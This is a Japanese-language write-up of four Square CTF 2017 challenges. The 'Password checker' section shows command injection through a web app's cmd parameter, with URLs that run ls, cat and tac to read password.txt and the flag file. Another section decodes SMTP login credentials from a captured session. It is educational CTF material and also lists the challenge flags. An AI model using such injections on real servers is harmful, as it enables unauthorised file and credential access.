Square CTF 2017 Writeup

CTF writeup

この大会は2017/10/4 22:00(JST)~2017/10/9 9:00(JST)に開催されました。
今回もチームで参戦。結果は5115点で1334チーム中14位でした。
自分で解けた問題をWriteupとして書いておきます。

Book of Allies (Grace Hopper 5)

scheduleタブを選択し、そこからリンクされているPDFを見てみる。
ホッチキスの露出しているページ、つまり真ん中のページの左側の一番上のセッションの会社名がフラグということらしい。全部で35ページあるので、18ページ目の左側を見る。

flag-thought-leadership-lab

Password checker (Web Security 50)

OSコマンドが実行できるが、結果は1行だけ表示される。

https://neget-kymud-nihat-fagoh-mifip.capturethesquare.com/run.php?cmd=cat%20../password.txt
password123

https://neget-kymud-nihat-fagoh-mifip.capturethesquare.com/run.php?cmd=ls%20-l%20..
-rw-r--r-- 3 root root 15 Oct 4 10:34 xxx_not_a_flag.txt

https://neget-kymud-nihat-fagoh-mifip.capturethesquare.com/run.php?cmd=ls%20-l%20../..
drwxr-xr-x 3 root root 4096 Oct 4 10:47 www

https://neget-kymud-nihat-fagoh-mifip.capturethesquare.com/run.php?cmd=ls%20-l%20../../..
drwxr-xr-x 1 root root 4096 Oct 4 10:47 var

https://neget-kymud-nihat-fagoh-mifip.capturethesquare.com/run.php?cmd=ls%20../f*
../flag.txt

https://neget-kymud-nihat-fagoh-mifip.capturethesquare.com/run.php?cmd=cat%20../flag.txt
line 2: flap-31aac7e26de449ee

https://neget-kymud-nihat-fagoh-mifip.capturethesquare.com/run.php?cmd=tac%20../flag.txt
line 1: flag-bc0a804287546c09
flag-bc0a804287546c09

The General's Cat (Crypto 50)

シーザー暗号。https://www.geocachingtoolbox.com/index.php?lang=en&page=caesarCipherで復号。

Rotation 17:
The domestic cat (Felis silvestris catus or Felis catus) is a small, typically furry, carnivorous mammal. They are often called house cats when kept as indoor pets or simply cats when there is no need to distinguish them from other felids and felines. Cats are often valued by humans for companionship and for their ability to hunt vermin. There are more than 70 cat breeds, though different associations proclaim different numbers according to their standards. The flag is the phrase with dashes: flag what is a domestic cat.

flag-what-is-a-domestic-cat

The Robot's Grandmother (Forensics 50)

SMTPTCP Streamで見る。

220 x.shh.sh ESMTP Exim 4.86 Wed, 06 Sep 2017 22:11:43 +0000
ehlo x.shh.sh
250-x.shh.sh Hello x.shh.sh [::1]
250-SIZE 52428800
250-8BITMIME
250-PIPELINING
250-AUTH LOGIN
250-STARTTLS
250-PRDR
250 HELP
auth login
334 VXNlcm5hbWU6
bWFsbG9yeQ==
334 UGFzc3dvcmQ6
ZmxhZy1zcGluc3Rlci1iZW5lZml0LWZhbHNpZnktZ2FtYmlhbg==
535 Incorrect authentication data
421 x.shh.sh lost input connection

$ echo ZmxhZy1zcGluc3Rlci1iZW5lZml0LWZhbHNpZnktZ2FtYmlhbg== | base64 -d
flag-spinster-benefit-falsify-gambian

flag-spinster-benefit-falsify-gambian